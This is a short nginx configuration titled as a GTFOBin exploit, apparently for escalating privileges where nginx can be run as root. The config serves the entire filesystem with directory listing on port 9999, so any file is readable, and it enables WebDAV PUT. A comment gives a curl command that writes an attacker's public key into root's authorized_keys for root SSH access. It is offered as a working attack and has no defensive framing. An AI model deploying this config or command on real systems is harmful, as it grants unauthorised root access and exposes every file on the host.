# GTFOBin: NGINX CONFIG EXPLOIT

# 0. read any files.

# 1. enable dav to upload files via curl
#    -  curl <target>:9999/root/ssh/authorized_keys --upload-file mane.pub

user root;
worker_processes auto;
pid /run/nginx2.pid;
include /etc/nginx/modules-enabled/*.conf;
events {
  worker_connections 768;
}

http {
  server {
    listen 9999;
    location / {
       root /;
       autoindex on;
       dav_methods PUT;
    }

  }
}